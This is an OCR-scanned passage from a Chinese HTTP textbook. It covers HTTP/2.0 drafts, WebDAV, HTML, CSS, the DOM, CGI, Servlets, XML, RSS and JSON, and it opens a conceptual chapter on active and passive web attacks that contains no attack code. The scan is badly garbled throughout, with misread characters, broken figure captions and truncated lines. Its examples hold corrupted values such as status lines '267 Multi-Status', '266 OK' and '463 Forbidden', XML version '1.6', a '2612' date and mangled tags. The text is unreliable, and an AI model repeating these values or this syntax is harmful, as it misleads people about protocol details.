目前 主流 的 HTTP/1.1 标准 ， 自 1999 年 发 布 的 RFC2616 之 后 再 未 进 
行 过 改 订 。SPDY 和 WebSocket 等 技术 纷纷 出 现 ， 很 难 断 言 HTTP/1.1 
仍 是 适用 于 当下 的 Web 的 协议 。 


负责 互联 网 技术 标准 的 IETEF (Internet Engineering Task Force， 互 联网 
工程 任务 组 ) 创立 httpbis (Hypertext Transfer Protocol 
Bis，http://datatracker.ietf.org/wg/httpbis/〉 工 作 组 ， 其 目标 是 推进 下 一 
代 HTTP 一 一 HTTP/2.0 在 2014 年 11 月 实现 标准 化 。 





HTTP/2.0 的 特点 


HTTP/2.0 的 目标 是 改善 用 户 在 使 用 Web 时 的 速度 体验 。 由 于 基本 上 
都 会 先 通过 HTTP/1.1 与 TCP 连接 ， 现 在 我 们 以 下 面 的 这 些 协议 为 基 
础 ， 探 讨 一 下 它们 的 实现 方法 。 





。 SPDY 

。 HTTP Speed 十 Mobility 

e。 Network-Friendly HITP Upgrade 
HTTP Speed 十 Mobility 由 微软 公司 起 草 ， 是 用 于 改善 并 提高 移动 端 
通信 时 的 通信 速度 和 性 能 的 标准 。 它 建立 在 Google 公司 提出 的 SPDY 
与 WebSocket 的 基础 之 上 。 


Network-Friendly HTTP Upgrade 主要 是 在 移动 端 通信 时 改善 HTTP 性 
能 的 标准 。 


HTTP/2.0 的 7 项 技术 及 讨论 
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HTTP/2.0 围绕 着 主要 的 7 项 技术 进行 讨论 ， 现 阶段 2012 年 8 月 13 
日 ) ， 大 都 倾 癌 于 采用 以 下 协议 的 技术 。 但 是 ， 讨 论 仍 在 持续 ， 所 以 
不 能 排除 会 发 生 重 大 改变 的 可 能 性 。 

表 9-1 


TLS 义务 化 





5 








客户 端 拉 电 〈Client Pull) /服务 器 推送 本 
(Server Push ) Se 
WebSocket Speed 十 Mobility 








注 : HTTP Speed 十 Mobility 简写 为 Speed 十 Mobility，Network-Friendly HTTP 
Upgrade 简写 为 Friendly。 


9.5 ”Web 服务 器 管理 文件 的 WebDAV 


WebDAV (Web-based Distributed Authoring and Versioning， 基 于 万 维 网 
的 分 布 式 创 作 和 版 本 控制 ) 是 一 个 可 对 Web 服务 器 上 的 内 容 直 接 进 
行文 件 复制 、 编 辑 等 操作 的 分 布 式 文件 系统 。 它 作为 扩展 HITP/1.1 
的 协议 定义 在 RFC4918。 


除了 创建 、 删 除 文件 等 基本 功能 ， 它 还 具备 文件 创建 者 管理 、 文 件 纺 


辑 过 程 中 禁止 其 他 用 户 内 容 铸 盖 的 加 锁 功能 ， 以 及 对 文件 内 容 修改 的 
版 本 控制 功能 。 
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J WebDAV 


WebDAV 直接 对 VWeb 服 务 器 上 的 文件 进行 操作 ee 
客户 端 服务 器 


复制 / 剪 切 文件 


加 锁 /解锁 文件 





图 : WebDAV 


使 用 HTTP/1.1 的 PUT 方法 和 DELETE 方法， 就 可 以 对 Web 服务 器 
ee 可 是 出 于 安全 性 及 便捷 性 等 考虑 ， 一 
豚 不 2 


9.5.1 扩展 HTTP/1.1 的 WebDAV 
针对 服务 器 上 的 资源 ，WebDAV 新 增加 了 一 些 概念 ， 如 下 所 示 。 


文件 C 属 性 
文件 名 : 文件 C 
大 小 : 1024KB 
创建 者 : ueno sen 





图 : WebDAV 扩展 的 概念 
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集合 (Collection) : 是 一 种 统一 管理 多 个 资源 的 概念 。 以 集合 大 
单位 可 进行 各 种 操作 。 也 可 实现 类 似 集合 的 集合 这 样 的 炙 加 。 


资源 〈Resource) : 把 文件 或 集合 称 为 资源 。 

属性 〈 了 Property) : 定义 资源 的 属性 。 定 义 以 “名 称 = 值 ” 的 格式 执 
行 。 

锁 (Lock) : 把 文件 设置 成 无 法 编辑 状态 。 多 人 同时 编辑 时 ， 可 
防止 在 同一 时 间 进 行内 容 写 入 。 

9.S.2 ”WebDAYV 内 新 增 的 方法 及 状态 码 


WebDAV 为 实现 远程 文件 管理 ， 向 HTTP/1.1 中 追加 了 以 下 这 些 方 
法 。 





PROPFIND : 获取 属性 
PROPPATCH : 修改 属性 

MKCOL : 创建 集合 

COPY : 复制 资源 及 属性 

MOVE : 移动 资源 

LOCK : 资源 加 锁 

UNLOCK : 资源 解锁 

为 配合 扩展 的 方法 ， 状 态 码 也 随 之 扩展 。 


102 Processing : 可 正常 处 理 请 求 ， 但 目前 是 处 理 中 状态 





207 Multi-Status : 存在 多 种 状态 
422 Unprocessible Entity : 格式 正确 ， 内 容 有 误 
423 Locked : 资源 已 被 加 锁 


424 Failed Dependency : 处 理 与 某 请 求 关 联 的 请 求 失 败 ， 因 此 不 再 维 
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持 依赖 关系 
507 Insufficient Storage : 保存 空间 不 足 
。WebDAYV 的 请 求实 例 


下 面 是 使 用 PROPFIND 方法 对 http:/www.example.com/file 发 起 
获取 属性 的 请 求 。 


PROPFIND /file HTTP/1.1 
Host: www.example.com 


Content-Type: application/xml; charset="utf-8" 
Content-Length: 219 


<?xm] version="1.6" encoding="utf-8" ?> 
<D:propfind xmlns:D="DAV:"> 
<D:prop xmlns:R="http://ns.example.com/boxschema/"> 
<R:bigbox/> 
<R:author/> 
<R:DingALing/> 
<R:Random/> 
</D:prop> 
</D:propfind> 





。WebDAV 的 响应 实例 


下 面 是 针对 之 前 的 PROPFIND 方法 ， 返 回 
http://www.example.com/file 的 属性 的 响应 。 


HTTP/1.1 267 Multi-Status 
Content-Type: application/xml; charset="utf-8" 


Content-Length: 831 





<?xml version="1.0" encoding="utf-8" ?> 
<D:multistatus xmlns:D="DAV:"> 
<D:response xmlns:R="http://ns.example.com/boxschema/' 
<D:href>http://www.example.com/file</D:href> 
<D:propstat> 
<D:prop> 
<R:bigbox> 


<R:BoxType>Box type A</R:BoxType> 
</R:bigbox> 
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<R:author> 
<R:Name>J.J. Johnson</R:Name> 
</R:author> 
</D:prop> 
<D:status>HTTP/1.1 266 OK</D:status> 
</D:propstat> 
<D:propstat> 
<D:prop><R:DingALing/><R:Random/></D:prop> 
<D:status>HTTP/1.1 463 Forbidden</D:status> 
<D:responsedescription> The user does not have ac 
</D:responsedescription> 
</D:propstat> 
</D:response> 
<D:responsedescription> There has been an access viol 
</D:responsedescription> 
</D:multistatus> 





为 何 HTTP 协议 受众 如 此 广泛 


本 章 讲 解 了 几 个 与 HTTP 相关 联 的 协议 使 用 案例 。 为 什么 HTTP 协 
议 受 众 能 够 如 此 广泛 呢 ? 


过 去 ， 新 编写 接 入 互联 网 的 系统 或 软件 时 ， 还 需要 同时 编写 实现 与 
人 


这 有 着 诸多 原因 ， 其 中 与 企业 或 组 织 的 防火 墙 设 定 有 着 莫大 的 关 
系 。 防 火 寺 的 基本 功能 就 是 蔡 止 非 指定 的 协议 和 端口 写 的 数据 包 通 
过 。 因 此 如 果 使 用 新 协议 或 端口 写 则 必须 修改 防火 增设 置 。 


互联 网 上 ， 使 用 率 最 高 的 当 属 Web。 不 管 是 否 具备 访问 FTP 和 
SSH 的 权限 ， 一 般 公 司 都 会 开放 对 Web 的 访问 。Web 是 基于 HTTP 
协议 运作 的 ， 因 此 在 构建 Web 服务 器 或 访问 Web 站 点 时 ， 需 事先 
设置 防火 墙 HITP 〈8Otcp) 和 HTTPS (443/Mcp) 的 权限 。 


许多 公司 或 组 织 已 设 定 权 限 将 HTTP 作为 通信 环境 ， 因 此 无 须 再 修 
改 防 火 墙 的 设 定 。 可 见 HTTP 具有 导入 简单 这 一 大 优势 。 而 这 也 是 
基于 HITP 服务 或 内 容 不 断 增 加 的 原因 之 一 。 


还 有 一 些 其 他 原因 ， 比 如 ， 作 为 HITP 客户 端的 浏览 器 已 相当 普 
裔 ，HTTP 服务 器 的 数量 已 颇具 规模 ，HTTP 本 喘 就 是 优 蜡 的 应 用 
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第 10 章 构建 Web 内 容 的 技术 


在 Web 刚 出 现时 ， 我 们 只 能 浏览 那些 页 面 样式 简单 的 内 容 。 如 今 ， 
Web 使 用 各 种 各 样 的 技术 ， 来 呈现 丰富 多 彩 的 内 容 。 





10.1 HTML 


10.1.1 ”Web 页面 几乎 全 由 HTML 构建 





HTML (HyperText Markup Language， 超 文本 标记 语言 ) 是 为 了 发 送 
Web 上 的 超 文本 〈Hypertext) 而 开发 的 标记 语言 。 超 文本 是 一 种 文档 
系统 ， 可 将 文档 中 任意 位 置 的 信息 与 其 他 信息 《文本 或 图 片 等 ) 建立 
关联 ， 即 超 链 接 文 本 。 标 记 语 言 是 指 通过 在 文档 的 某 部 分 罕 插 特别 的 
字符 串 标签 ， 用 来 修饰 文档 的 语言 。 我 们 把 出 现在 HTML 文档 内 的 
这 种 特殊 字符 串 叫 做 HIML 标签 (Tag) 。 


平时 我 们 浏览 的 Web 页 面 几 乎 全 是 使 用 HTML 写成 的 。 由 HTML 构 
成 的 文档 经 过 浏览 器 的 解析 、 泻 染 后 ， 呈 现 出 来 的 结果 就 是 Web 页 
面 。 
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六 浏览 器 打开 由 HTML 写 成 的 文档 
一 
HTML hacki 





就 可 浏览 浑 染 后 的 Web 页 面 
图 : HTML 


以 下 区 是 用 HTML 编 写 的 文档 的 例子 。 而 这 份 HTML 文档 内 这 种 被 < 
> EE 在 标签 的 作用 下 ， 文 档 会 改变 样式 ， 或 插 
入 图 片 、 链 接 。 


<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset 
<title>hackr.jp</title> 
<«style type="text/css"> 
.logo { 
padding: 26pX ; 
text-align: Center 
</style> 
</head> 


<body> 

<div class="logo"> 
<p><img src="photo.jpg" alt="photo" width="246" height="12 
<p><img src="hackr.gif" alt="hackr.jp" width="246" height 
<p><a href="http://hackr.jp/">hackr.jp</a> </p> 

</div> 

</body> 

</html> 





10.1.2 ” HTML 的 版 本 


Tim Berners-Lee 提出 HTTP 概念 的 同时 ， 还 提出 了 HTML 原型 。1993 
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年 在 伊利 诺 伊 大 学 的 NCSA (The National Center for Supercomputing 
Applications， 国 家 超级 计算 机 应 用 中 心 ) 发 布 了 Mosaic 浏览 器 ( 世 
界 首 个 图 形 界面 浏览 器 程序 ) ， 而 能 够 被 Mosaic 解析 的 HIML， 统 
一 标准 后 即 作为 HTML 1.0 发 布 。 


目前 的 最 新 版 本 是 HTML4.01 标准 ，1999 年 12 月 W3C (World Wide 
Web Consortium) 组 织 推荐 使 用 这 一 版 本 。 下 一 个 版 本 ， 预 计 会 在 
2014 年 左右 正式 推荐 使 用 HIMLS 标准 。 


HTMLS 标准 不 仅 解 决 了 浏览 器 之 间 的 兼容 性 问题 ， 并 且 可 把 文本 作 
为 数据 对 待 ， 更 容易 复 用 ， 动 画 等 效果 也 变 得 更 生动 。 


时 全 今日 ， HTML 仍 存 在 较 多 基 而 未 决 问 题 。 有 些 浏览 右 未 遵 御 
HTML 标准 实现 ， 或 扩展 自用 标签 等 ， 这 都 反映 了 HIML 的 标准 实际 
上 尚未 统一 这 一 现状 。 











10.1.3 ”设计 应 用 CSS 


CSS (Cascading Style Sheets， 层 登 样 式 表 ) 可 以 指定 如 何 展现 HTML 
内 的 各 种 元 素 ， 属 于 样式 表 标 准 之 一 。 即 使 是 相同 的 HTML 文档 ， 
通过 改变 应 用 的 CSS， 用 浏览 器 看 到 的 页 面 外 观 也 会 随 之 改变 。CSS 
的 理念 就 是 让 文档 的 结构 和 设计 分 离 ， 达 到 解 灯 的 目的 。 


下 面 让 我 们 来 看 一 个 CSS 的 用 例 。 


.logo { 
padding: 26pX ; 


text-align: center 





可 在 选择 器 〈selector) .logo 的 指定 范围 内 ， 使 用 {} 括 起 来 的 声明 块 
中 写 明 的 padding: 20px 等 声明 语句 应 用 指定 的 样式 。 


可 通过 指定 HTML 元 素 或 特定 的 class、ID 等 作为 选择 器 来 限定 样式 
的 应 用 范围 。 


10.2 ”动态 HTML 


10.2.1 让 Web 页 面 动 起 来 的 动态 HTML 
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所 谓 动 态 HIML (Dynamic HTML) ， 是 指使 用 客户 端 脚本 语言 将 静 
态 的 HTML 内 容 变 成 动态 的 技术 的 总 称 。 鼠 标 单 击 点 开 的 新 闻 、 
Google Maps 等 可 滚动 的 地 图 就 用 到 了 动态 HTML 。 


动态 HTML 技术 是 通过 调用 客户 端 脚本 语言 JavaScript， 实 现 对 
HTML 的 Web 页 面 的 动态 改造 。 利 用 DOM (Document Object 
Model， 文 档 对 象 模型 ) 可 指定 欲 发 生动 态 变化 的 HTML 元 素 。 


10.2.2 ”更 易 控 制 HTMEL 的 DOM 


DOM 是 用 以 操作 HTML 文档 和 XML 文档 的 API (Application 
Programming Interface， 应 用 编程 接口 ) 。 使 用 DOM 可 以 将 HTML 内 
的 元 素 当 作对 象 操作 ， 如 取出 元 素 内 的 字符 串 、 改 变 那个 CSS 的 属 
性 等 ， 使 页 面 的 设计 发 生 改 变 。 


通过 调用 JavaScript 等 脚本 语言 对 DOM 的 操作 ， 可 以 以 更 为 简单 的 
方式 控制 HTML 的 改变 。 





<h1> 繁 琐 的 Neb 安 全 </h1> 
<p> 第 工 部 分 ”Web 的 构成 元 素 </p> 


<p> 第 工 部 分 “浏览 器 的 安全 功能 </p> 
<p> 第 I 部 分 “ 接 下 来 发 生 的 事 </p> 





比如 ， 从 JavaScript 的 角度 来 看 ， 将 上 述 HTML 文档 的 第 3 个 元 素 
(CP 标签 ) 改变 文字 颜色 时 ， 会 像 下 方 这 样 编写 代码 。 


<SCript type="text/javascript"> 
var content = document.getElementsByTagName('P'); 


content[2].style.color = “#FF6606 ' ; 
</script> 





document.getElementsByTagName('P') 语句 调用 getElementsByTagName 
函数 ， 从 整个 HTML 文档 〈document object) 内 取出 了 元 素 。 接 下 来 
的 content[2].style.color = '#FF0000' 语句 指定 content 的 索引 为 2 (第 3 
个 ) 的 元 素 的 样式 颜色 改 为 红色 (#EF0000) 。 


DOM 内 存在 各 种 函数 ， 使 用 它们 可 查阅 HTML 中 的 各 个 元 系 。 
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10.3 ”Web 应 用 


10.3.1 通过 Web 提供 功能 的 Web 应 用 


Web 应 用 是 指 通 过 Web 功能 提供 的 应 用 程序 。 比 如 购物 网 站 、 网 上 
银行 、SNS、BBS、 搜 索引 擎 和 e-learning 等 。 互 联网 (Internet) 或 企 
业内 网 〈Intranet) 上 台布 各 式 各 样 的 Web 应 用 。 


原本 应 用 HTTP 协议 的 Web 的 机 制 就 是 对 客户 器 发 来 的 请 求 ， 返 回 
事前 准备 好 的 内 容 。 可 随 着 Web 越 来 越 普 及 ， 仅 靠 这 样 的 做 法 已 不 
足以 应 对 所 有 的 需求 ， 更 需要 引入 由 程序 创建 HTML 内 容 的 做 法 。 


类 似 这 种 由 程序 创建 的 内 容 称 为 动态 内 容 ， 而 事先 准备 好 的 内 容 称 为 
静态 内 容 。Web 应 用 则 作用 于 动态 内 容 之 上 。 














动态 内 容 | hi 
请 求 ISBN=4798128090 4798128090 


Vs 
响应 


返回 由 Web 服 务 器 上 的 程序 > 








创建 的 HTML 内 容 


请 求 
响应 


返回 事先 已 编写 | 六 4 | 
好 的 HTML | 
图 : 动态 内 容 和 毅 态 内 容 


10.3.2 与 Web 服务 器 及 程序 协作 的 CGI 


CGI (Common Gateway Interface， 通 用 网 关 接 口 ) 是 指 Web 服务 器 在 
接收 到 客户 问 发 送 过 来 的 请 求 后 转发 给 程序 的 一 组 机 制 。 在 CGI 的 
作用 下 ， 程 序 会 对 请 求 内 容 做 出 相应 的 动作 ， 比 如 创建 HTML 等 动 
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态 内 容 。 


使 用 CGI 的 程序 叫做 CGI 程序 ， 通 常 是 用 Perl、PHP、Ruby 和 C 等 
编程 语言 编写 而 成 。 























VVeb 服 务 器 
CGIl 是 将 请 求 转 给 CGI| 程 序 处 理 的 一 种 机 制 


图 : CGI 


有 关 CGI 更 为 翔实 的 内 容 请 参考 RFC3875“The Common Gateway 
Interface (CGI) Version 1.1” 


10.3.3 Java 而 普及 的 Servlet 


Servletl 是 一 种 能 在 服务 器 上 创建 动态 内 容 的 程序 。Servlet 是 用 Java 
语言 实现 的 一 个 接口 ， 属 于 面 同 企业 级 Java (JavaEE，Java 
Enterprise Edition) 的 一 部 分 。 


1 没有 对 应 中 文 译 名 ， 全 称 是 Java Servlet。 名 称 取 自 Servlet=Server+Applet， 表 示 
轻 量 服务 程序 。 译 者 注 

之 前 提 及 的 CGI， 由 于 每 次 接 到 请 求 ， 程 序 都 要 跟着 启动 一 次 。 因 此 
一 旦 访问 量 过 大 ，Web 服务 器 要 承担 相当 大 的 负载 。 而 Servlet 运行 
在 与 Web 服务 器 相同 的 进程 中 ， 因 此 受到 的 负载 较 小 <。Servlet 的 运 
行 环境 叫做 Web 容器 或 Servlet 容器 。 


2 Servlet 常 驻 内 存 ， 因 此 在 每 次 请 求 时 ， 可 启动 相对 进程 级 别 更 为 轻 量 的 
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Servlet， 程 序 的 执行 效率 从 而 变 得 更 高 。 一 一 译 者 注 
Servlet 作为 解决 CGI 问题 的 对 抗 技术 3， 随 Java 一 起 得 到 了 普及 。 


3 说 对 抗 的 原因 在 于 ， 这 个 方向 上 已 存在 用 Perl 编写 的 CGI， 实 现在 Apache 
HTTP Server 上 内 置 mod_php 模块 后 可 运行 PHP 程序 、 微 软 主 导 的 ASP 等 技术 。 









































一 一 译 者 注 
CGI 的 应 用 场景 
每 次 请 求 都 启动 新 的 CGI 程序 

Servlet 的 应 用 场景 

ey 
上 Servlet 
» 
Servlet 运 行 在 Web 容 器 内 
图 : Servlet 


随 着 CGI 的 普及 ， 每 次 请 求 都 要 启动 新 CGI 程序 的 CGI 运行 机 制 逐 
渐变 成 了 性 能 瓶 贷 ， 所 以 之 后 Servlet 和 mod perl 等 可 直接 在 Web 服 
务 器 上 运行 的 程序 才 得 以 开发 、 普 及 。 


10.4 数据 发 布 的 格式 及 语言 


10.4.1 可 扩展 标记 语言 








XML (eXtensible Markup Language， 可 扩展 标记 语言 ) 是 一 种 可 按 应 
用 目标 进行 扩展 的 通用 标记 语言 。 旨 在 通过 使 用 XML， 使 互联 网 数 
据 共 享 变 得 更 容易 。 


XML 和 HTML 都 是 从 标准 通用 标记 语言 SGML (Standard Generalized 
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Markup Language) 简化 而 成 。 与 HIML 相 比 ， 它 对 数据 的 记录 方式 
做 了 特殊 处 理 。 


下 面 我 们 以 HTML 编 写 的 某 公 司 的 研讨 会 议 议程 为 例 进行 说 明 。 





<html> 

<head> 

<title>T 公 司 研讨 会 介绍 </title> 
</head> 

<body> 

<h1>T 公 司 研讨 会 介绍 </h1> 


<ul> 
<1i> 研 讨 会 编写 : TR661 
<ul> 


<1i>Web 应 用 程序 脆弱 性 诊断 讲座 </1i> 


</UL> 
</1i> 
<1i> 研 讨 会 编号: TR662 
<Ul> 
<1i> 网 络 系统 脆弱 性 诊断 讲座 </1iy> 
</UL> 
</1i> 
</UL> 
</body> 
</html> 





用 浏览 器 打开 该 文档 时 ， 就 会 显示 排列 的 列表 内 容 ， 但 如 果 这 些 数 据 
被 其 他 程序 读 取 会 发 生 什 么 ? 茶 些 程序 虽然 具备 可 通过 识别 布局 特征 
取出 文本 的 方法 ， 但 这 份 HTML 的 样式 一 旦 改变 ， 要 读 取 数据 内 容 
也 惑 变 得 相对 困难 了 。 可 见 ， 为 了 保持 数据 的 正确 读 取 ，HITML 不 适 
合用 来 记录 数据 结构 。 


接 看 将 这 份 列表 以 XML 的 形式 改写 就 成 了 以 下 的 示例 。 

















< 研讨 会 编号 ="TR661” 主题 ="Web 应 用 程序 脆弱 性 诊断 讲座 "> 





“类别 > 安 全 </ 类 别 > 
< 概要 > 为 深入 研究 Neb 应 用 程序 脆弱 性 诊断 必要 的 ..</ 概 要 > 
</ 研 讨 会 > 
< 研讨 会 编号 ="TR662"” 主题 =" 网 络 系统 脆弱 性 诊断 讲座 "> 
“类别 > 安 全 </ 类 别 > 
< 概要 > 为 深入 研究 网 络 系统 脆弱 性 诊断 必要 的 .…/ 概 要 > 
</ 研 讨 会 > 
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a HIML 一 样 ， 使 用 标签 构成 树 形 结构 ， 并 且 可 目 定 义 扩展 标 


从 XML 文档 中 读 取 数据 比 起 HTML 更 为 简单 。 由 于 XML 的 结构 基 
本 上 都 是 用 标签 分 割 而 成 的 树 形 结构 ， 因 此 通过 语法 分 析 器 

(Parser) 的 解析 功能 解析 XML 结构 并 取出 数据 元 素 ， 可 更 容易 地 对 
数据 进行 读 取 。 


更 容易 地 复 用 数据 使 得 XML 在 互联 网 上 被 广泛 接受 。 比 如 ， 可 用 在 
2 个 不 同 的 应 用 之 间 的 交换 数据 格式 化 。 


10.4.2 ”发 布 更 新 信息 的 RSS/Atom 


RSS《〈 简 易 信 息 聚 合 ， 也 叫 聚 合 内 容 ) 和 Atom 都 是 发 布 新 闻 或 博客 
日 志 等 更 新 信息 文档 的 格式 的 总 称 。 两 者 都 用 到 了 XML。 


RSS 有 以 下 版 本 ， 名 称 和 编写 方式 也 不 相同 。 

RSS 0.9 (RDF Site Summary) : 最 初 的 RSS 版 本 。1999 年 3 月 由 网 
公司 自行 开发 用 于 其 门户 网 站 。 基 础 构图 创建 在 初期 的 RDF 
纲 格 上 。 


RSS 0.91 (Rich Site Summary) : 在 RSS0.9 的 基础 上 扩展 元 素 ， 于 
1999 年 7 月 开发 完毕 。 非 RDF 规格 ， 使 用 XML 方式 编写 。 


RSS 1.0 (RDF Site Summary) : RSS 规格 正 处 于 混乱 状态 。2000 年 
12 月 由 RSS-DEYV 工作 组 再 次 采用 RSS0.9 中 使 用 的 RDF 规格 发 布 。 


RSS2.0 (Really Simple Syndication) : 非 RSS1.0 发 展 路 线 。 增 加 支 
持 RSS0.91 的 兼容 性 ，2000 年 12 月 由 UserLand Software 公司 开发 完 
成 。 

















Atom 具有 以 下 两 种 标准 。 


Atom 供稿 格式 〈Atom Syndication Format) : 为 发 布 内 容 而 制定 的 
网 站 消息 来 源 格 式 ， 单 讲 Atom 时 ， 束 是 指 此 标准 。 


Atom 出 版 协定 (Atom 了 Publishing Protocol) : 为 Web 上 内 容 的 新 增 
或 修改 而 制定 的 协议 。 
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用 于 订阅 博客 更 新 信息 的 RSS 阅读 器 ， 这 种 应 用 几乎 文 持 RSS 的 所 
有 版 本 以 及 Atom。 


下 面 是 RSS1.0 的 示例 。 


<?xm] version="1.6" encoding="utf-8" ?> 

<?xml-stylesheet href="http://d.hatena.ne.jp/sen-u/rssxsl" 
<rdf:RDF 

xmlns="http://purl.org/rss/1.060/" 
xmlns:rdf="http://www.w3.org/1999/862/22-rdf-syntax-ns#" 
xmlns:content="http://purl.org/rss/1.6/modules/content/" 
xmlns:dc="http://purl.org/dc/elements/1.1/" 
xml:lang="ja"> 

“channel rdf:about="http://d.hatena.ne.jp/sen-u/rss"> 
<title> 免 子 的 文学 日 记 </titley> 
<link>http://d.hatena.ne.jp/sen-u/</link> 
<description> 兔 子 的 文学 日 记 </description> 

</channel> 


<item rdf:about="http://d.hatena.ne.jp/sen-u/206121215/p1"> 
<title>[security] 提 供 脆弱 性 悬赏 奖金 计划 的 网 站 一 览 </titley> 
<link>http://d.hatena.ne.jp/sen-u/260121215/p1</1ink> 
<description> 正 是 所 谓 “ 是 所 谓 Bounty Programs”、 处 理 接受 Web 脆 皆 
<dc:creator>sen-u</dc:creator> 
<dc:date>2612-12-15</dc:datey> 
<«dc:subject>security</dc:subject> 

</item> 























10.4.3 ”JavaScript 衍生 的 轻 量 级 易 用 JSON 


JSON (JavaScript Object Notation) 是 一 种 以 

JavaScript (ECMAScript) 的 对 象 表示 法 为 基础 的 轻 量 级 数据 标记 语 
言 。 能 够 处 理 的 数据 类 型 有 false/null/true/ 对 象 /数组 / 数字 /字符 
串 ， 这 7 种 类 型 。 


"name": "Web Application Security", "num": "TR8061"} 





JSON 让 数据 更 轻 更 纯粹 ， 并 且 JSON 的 字符 串 形式 可 被 JavaScript 
轻易 地 读 入 。 当 初 配合 XML 使 用 的 Ajax 技术 也 让 JSON 的 应 用 变 得 
更 为 广泛 。 另 外 ， 其 他 各 种 编程 语言 也 提供 丰富 的 库 类 ， 以 达到 轻便 
操作 JSON 的 目的 。 
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有 关 JSON 更 为 翔实 的 内 容 请 参考 RFC4627“The applicatiomjson 
Media Type for JavaScript Object Notation (JSON)” 
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第 11 章 Web 的 攻击 技术 


互联 网 上 的 攻击 大 都 将 Web 站 点 作为 目标 。 本 章 讲解 具体 有 哪些 攻 
击 Web 站 点 的 手段 ， 以 及 攻击 会 造成 怎样 的 影 啊 。 





11.1 针对 Web 的 攻击 技术 
简单 的 HTTP 协议 本 映 并 不 存在 安全 性 问题 ， 因 此 协议 本 导 几 乎 不 会 
成 为 攻击 的 对 象 。 应 用 HTTP 协议 的 服务 器 和 客户 端 ， 以 及 运行 在 服 
务 器 上 的 Web 应 用 等 资源 才 是 攻击 目标 。 


目前 ， 来 自 互联 网 的 攻击 大 多 是 冲 着 Web 站 点 来 的 ， 它 们 大 多 把 
web 应 用 作为 攻击 目标 。 本 章 主要 针对 Web 应 用 的 攻击 技术 进行 讲 
。 
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Exim 2% 


ProFTPD 
3% 





互联 网 上 重要 攻击 事件 明细 
参见 : LAC JSOC 株式 会 社 的 入 侵 分 析 倾向 报告 Vol.18 (2012 年 4 月 26 日 ) 


图 : 攻击 事件 倾 问 
11.1.1 HTTP 不 具备 必要 的 安全 功能 


与 最 初 的 设计 相 比 ， 现 今 的 Web 网 站 应 用 的 HTTP 协议 的 使 用 方式 
己 友 生 了 翻天 和 宪 地 的 变化 。 几 平 现 今 所 有 的 Web 网 站 都 会 使 用 会 话 
(session) 管理 、 加 密 处 理 等 安全 性 方面 的 功能 ， 而 HITP 协议 内 并 
不 具备 这 些 功能 。 


从 整体 上 看 ，HTTP 就 是 一 个 通用 的 单纯 协议 机 制 。 因 此 它 具 备 较 多 
优势 ， 但 是 在 安全 性 方面 则 呈 劣 势 。 


就 拿 远程 登录 时 会 用 到 的 SSH 协议 来 说 ，SSH 具备 协议 级 别 的 认证 
及 会 话 管 理 等 功能 ，HTTP 协议 则 没有 。 男 外 在 架设 SSH 服务 方面 ， 
任何 人 都 可 以 轻易 地 创建 安全 等 级 高 的 服务 ， 而 HTTP 即使 已 架设 好 
服务 器 ， 但 若 想 提 供 服务 器 基础 上 的 Web 应 用 ， 很 多 情况 下 都 需要 
重新 开发 。 

因此 ， 开 发 者 需要 自行 设计 并 开发 认证 及 会 话 管理 功能 来 满足 Web 
应 用 的 安全 。 而 自行 设计 就 意味 着 会 出 现 各 种 形形色色 的 实现 。 结 
果 ， 安 全 等 级 并 不 完备 ， 可 仍 在 运作 的 Web 应 用 背后 却 隐 藏 着 各 种 
容易 被 攻击 者 滥用 的 安全 漏洞 的 Bug。 


11.1.2 ”在 客户 问 即 可 自 改 请 求 
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在 Web 应 用 中 ， 从 浏览 器 那 接 收 到 的 HTTP 请 求 的 全 部 内 容 ， 都 可 
以 在 客户 端 自 由 地 变更 、 焉 改 。 所 以 Web 应 用 可 能 会 接收 到 与 预期 
数据 不 相同 的 内 容 。 


在 HTTP 请求 报 文 内 加 载 攻击 代码 ， 就 能 发 起 对 Web 应 用 的 攻击 。 
通过 URL 碍 询 字 段 或 表单 、HTITP 首部 、Cookie 等 途径 把 攻击 代码 传 
入 ， 奉 这 时 Web 应 用 存在 安全 漏洞 ， 那 内 部 信息 束 会 遭 到 狗 取 ， 或 
被 攻击 者 拿 到 管理 权限 。 











| 存在 安全 漏洞 的 Web 应 用 | 
加 
Wi 


oO" 








ee ee 
请 a | i 
mm 如 
Oy RE vv ee we eem 
(Eu i Se 
Ee y nd il nh voten pe 


攻击 老 





窃取 信息 或 
夺取 权限 





通过 URL 查 询 字 段 或 表单 、HTTP 首 
部 、Cookie 等 途径 把 攻击 代码 传 入 


图 : 对 Web 应 用 的 攻击 
11.1.3 ”针对 Web 应 用 的 攻击 模式 
对 Web 应 用 的 攻击 模式 有 以 下 两 种 。 

。 主动 攻击 

。 被 动 攻 击 


。 以 服务 器 为 目标 的 主动 攻击 


主动 攻击 (active attack) 是 指 攻击 者 通过 直接 访问 Web 应 用 ， 
把 攻击 代码 传 入 的 攻击 模式 。 由 于 该 模式 是 直接 针对 服务 器 上 的 
资源 进行 攻击 ， 因 此 攻击 者 需要 能 够 访问 到 那些 资源 。 
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C060 000 
入 攻击 。 







主要 攻击 服务 器 上 的 资源 


了 执行 攻击 代码 








图 : 主动 攻击 
。 以 服务 器 为 目标 的 被 动 攻击 

被 动 攻击 〈passive attack) 是 指 利 用 图 套 生 上 略 执 行 攻击 代码 的 攻 
击 模式 。 在 被 动 攻击 过 程 中 ， 攻 击 者 不 直接 对 目标 Web 应 用 访 
问 发 起 攻击 。 

被 动 攻击 通 间 的 攻击 模式 如 下 所 示 。 


步骤 1:， 攻击 者 诱 使 用 户 触 发 已 设置 好 的 陷阱 ， 而 陷阱 会 启动 发 
送 已 租 入 攻击 代码 的 HITP 请 求 。 


步骤 2: 当 用 户 不 知 不 觉 中 招 之 后 ， 用 户 的 浏览 器 或 邮件 客户 站 
就 会 触 友 这 个 陷阱 。 

步骤 3: 中 招 后 的 用 户 浏览 器 会 把 含有 攻击 代码 的 HTTP 请 求 发 
送 给 作为 攻击 目标 的 Web 应 用 ， 运 行 攻击 代码 。 


步骤 4: 执行 完 攻 击 代码 ， 存 在 安全 漏洞 的 Web 应 用 会 成 为 攻 
击 者 的 跳板 ， 可 能 导致 用 户 所 持 的 Cookie 等 个 人 信息 被 贸 取 ， 
登录 状态 中 的 用 户 权 限 遭 恶意 滥用 等 后 果 。 


馈 动 攻击 模式 中 具有 代表 性 的 攻击 是 跨 站 脚本 攻击 和 跨 站 点 请 求 


伪造 
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主要 攻击 用 户 的 资源 和 权限 | 


人 4 执行 攻击 代码 的 后 果 是 用 户 所 
和 Cookie 等 被 窃取 、 用 户 权 


限 遭 恶意 滥用 | 








二 
引用 户 的 浏览 器 运行 攻击 代码 。 二 
